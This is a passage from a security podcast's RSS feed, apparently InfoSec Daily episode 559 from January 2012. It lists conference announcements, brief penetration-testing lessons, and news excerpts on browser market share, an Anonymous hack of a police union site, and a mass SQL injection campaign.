<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Know not only how to use the tool, but what the tool can/cannot do.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> ALWAYS read the Statement of Work (SOW) before you show-up on-site. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Write down what you&#39;ve found, include the how and when* </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When you run an exploit, don&rsquo;t do it blindly. Always, always, know what the exploit does, and how it will affect the machine you&rsquo;re attacking. (deploying an &ldquo;agent&rdquo; means you`ve exploited the machine)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Very Important </span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30685_3-57350968-264/mobile-browsing-reaches-all-time-high"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30685_3-57350968-264/mobile-browsing-reaches-all-time-high</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you haven&#39;t whipped your Web site into shape for easy viewing on small-screen devices, you&#39;d better get cracking.</span><img height="321px;" src="https://lh5.googleusercontent.com/ynX4vxO1uOTpSg8V7ltFkydmHdwzZhUHSNgMg56ig0-XDAb7wt4ib_w9KydBkMPAf-Ay1qplsSLTCn-3IeSZfp43mbZZt0RxaZAP33K52fDjeobEkaA" width="598px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mobile browsing reached its highest levels so far, 7.7 percent of total browser usage, in December.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(Credit: Net Applications)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s because the use of mobile devices reached an all-time high in December, accounting for 7.7 percent of browser usage according to Net Applications&#39; measurements of</span><a href="http://www.netmarketshare.com/faq.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> daily visits to its network of 40,000 Web sites</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. That may still be a small fraction of total Web traffic, but it&#39;s a large and growing population in absolute numbers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tablet browsing in many ways is similar to desktop browsing; screen resolution on the dominant iPad and iPad 2 aren&#39;t that far off a laptop. But touch interfaces are different from mouse interfaces, especially when it comes to tapping buttons with precision. And smaller tablets are awkwardly in between the iPad and mobile-phone screens. It&#39;s for these reasons that there&#39;s a lot of work in retooling CSS and other Web technologies to make Web sites adjust to different screen sizes, but for now it&#39;s a tough challenge for Web programmers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among</span><a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=1&amp;qpcustomb=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> mobile browsers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Apple&#39;s Safari remained the top dog with 53.3 percent of usage, a drop from 55.0 percent in November. Opera rose to 21.7 percent and Google&#39;s Android browser dipped to 15.9 percent in December, making their reversed positions in October look more like an anomaly than the new order.</span><img height="266px;" src="https://lh5.googleusercontent.com/uiAXrgL2rhB5rw8sznOTJbfyUNcmQjJwC0YttkH4z1n708zCUUuqqo29wiWeMEPnN48GplnjDbd6xYGrE9TSI6_jN9lO9WozU2uS9wRsXSlOotozIWI" width="553px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple&#39;s Safari leads mobile browser usage.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(Credit: Net Applications)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the</span><a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=1&amp;qpcustomb=0"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> desktop browser market</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, months-long trends continued unabated. The top dog, Microsoft&#39;s Internet Explorer, fell from 52.6 percent to 51.9 percent. Mozilla&#39;s Firefox also fell, 22.1 percent to 21.8 percent, while Google&#39;s Chrome rose from 18.2 percent to 19.1 percent.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.flyingpenguin.com/?p=15273"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.flyingpenguin.com/?p=15273</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The end of December 2011 marked a significant milestone for IE6 measurement. The U.S. finally has dropped below 1% usage. &nbsp;Things even are looking good for bright red China, which</span><a href="http://www.ie6countdown.com/#map"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> still sits over 25% (4% of the world)</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> but has dropped a whopping 10% in under a year.</span><img height="343px;" src="https://lh4.googleusercontent.com/Afnrj1182oHe2Wclmjrm64Pr0iu2674vNvBU7B1FwZK4JXFD4JT3fkycFN932xjS-bANdo5XySa90lCZSzdXcJ9irg0eIH0h9a2GTLaX-mHCzZxzkN0" width="610px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is possible that</span><a href="http://msdn.microsoft.com/en-us/library/ms537509%28v=vs.85%29.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> measurement methods</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> may be skewed by proxies and bogus tokens but the more likely story is that China is on a browser support time-line that can&#39;t seem to get past an OS introduction date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This reminds me of a time years ago when I was called in by a huge software-as-a-service provider and asked how to get SSLv2 through a PCI DSS assessment. &quot;Why would you want to do that&quot; I asked. &quot;We have a lot of IE6 users&quot; was their reply.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">My response was twofold. First, I questioned whether IE6 data and SSLv2 data was trusted. Browsers can negotiate down to SSLv2 but that does not mean they were incapable of running SSLv3 or better. Perhaps if they dug into the data they would find a different picture and see far less IE6. Second, I recommend to post a warning banner to any IE6 user to upgrade their browser within a set time-frame or with a count-down clock. Even something like</span><a href="http://www.ie6countdown.com/join-us.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> an orange warning banner would be nice</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/anonymous-leaks-info-following-california-police-union-website-hack-010312"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/anonymous-leaks-info-following-california-police-union-website-hack-010312</span></a></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website for California&rsquo;s Statewide Law Enforcement Association (CSLEA) union remained offline Tuesday following the announcement of a hack by well-known hacktivist group Anonymous over the holiday weekend.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In part of what the group has deemed &ldquo;pr0j3ct m4hy3m,&rdquo; (project mayhem) Anonymous released approximately 2,500 names, addresses and phone numbers of those affiliated with the union, many of them police officers, according to</span><a href="http://www.news10.net/news/article/171017/2/CSLEA-members-react-to-Anonymous-hacking"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sacramento&rsquo;s News 10</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. The group also published some of the members&rsquo; credit card information taken from the group&rsquo;s online gift shop.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hack was made public by a tweet from</span><a href="https://twitter.com/#%21/YourAnonNews/status/153286252911796225"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> @YourAnonNews late Saturday</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &ldquo;BREAKING: California Statewide Law Enforcement Agency DEFACED and PWNT by #AntiSec #Anonymous.&rdquo; A note on the site, also linked to in the tweet and</span><a href="http://pastebin.com/MSaBvt9R"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> now published on Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, claims that thousands of police user names and passwords had been circulated across Anonymous channels for the two months leading up to the disclosure of the hack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Threatpost previously reported, private e-mail correspondence belonging to Fred Baclagan, a special agent with the California Department of Justice, was initially leaked as part of this hack in mid-November.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.securitypark.co.uk/security_article267100.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitypark.co.uk/security_article267100.html</span></a></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It has been reported that the so-called `Lilupophilupop.com&rsquo; SQL injection attack has now compromised more than a million sites.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Imperva comments and says the fact that the number of site comprises has soared in just a few weeks highlights the issue that SQL attacks are still a major problem for companies hosting Web sites and their users.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Rob Rachwald, Director of Security Strategy with the data security specialist, SQL injection is now the most pernicious vulnerability in human computer history.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Over the last six year years, our research has shown that SQL injection has been responsible for 83 per cent of successful hacking-related data breaches and &ndash; as incidents like this confirm &ndash; the trend is clearly rising. Perhaps worse, with hackers automating their attacks, no-one who hosts a Web application is immune,&rdquo; he said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Our report of last September (</span><a href="http://bit.ly/vxB5uI"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://bit.ly/vxB5uI</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) found that Web applications suffered an average of 71 SQL injection attempts every hour &ndash; that&rsquo;s more than one a minute. Specific applications, meanwhile, were found to occasionally be under aggressive attack, with peaks of between 800 and 1,200 attacks an hour &ndash; i.e. one attack every 3.0 to 4.5 seconds,&rdquo; he added.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rachwald explained that defending against SQL injection attacks is no easy task, since databases are integral components of Web applications.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.globalpost.com/dispatch/news/regions/asia-pacific/india/111204/india-hackers-technology-computers"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.globalpost.com/dispatch/news/regions/asia-pacific/india/111204/india-hackers-technology-computers</span></a></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To paraphrase an old saw: It takes a geek to catch a geek. That&#39;s the logic behind a new Indian response to the growing threat of cyber war, anyway.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Indian authorities were stunned by the impact of the Stuxnet virus on Iran&#39;s nuclear facility at Natanz last year. Now, in the wake of repeated assaults on Indian company and government web sites, an organization of self-professed &quot;white hat&quot; hackers is recruiting its own army.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If you see the statistics, less than 15 percent of Indians use the internet, but we are already No. 1 when it comes to virus infections and we are No. 2 in cyber crimes,&rdquo; said Rajshekhar Murthy, an Indian hacker and entrepreneur.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last month, at Malcon &mdash; the malware conference Murthy founded in 2010 &mdash; the security expert&#39;s nonprofit Information Security and Analysis Center (ISAC) unveiled plans to create a national registry of hackers with the training to protect the country&#39;s critical electronic infrastructure.</span></p>
<p dir="ltr" style="margin: 0pt 5pt 0pt 1pt;">&nbsp;</p>
<p dir="ltr" id="internal-source-marker_0.6448933620174295" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">नहीं टिकटिक मल (Don&rsquo;t Click Shit)</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">करते बकवास बात नहीं (Don&rsquo;t Talk Shit)</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-559-pentest-lessons-mobile-browsing-ie6-anonymous-sqli-and-%e0%a4%b9%e0%a5%88%e0%a4%95%e0%a4%b0-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a5%87%e0%a4%a8%e0%a4%be/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3331/0/infosec-daily-podcast-episode-559.mp3" length="19208295" type="audio/mpeg" />
		<itunes:duration>0:39:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 559 for January 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Br[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 559 for January 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
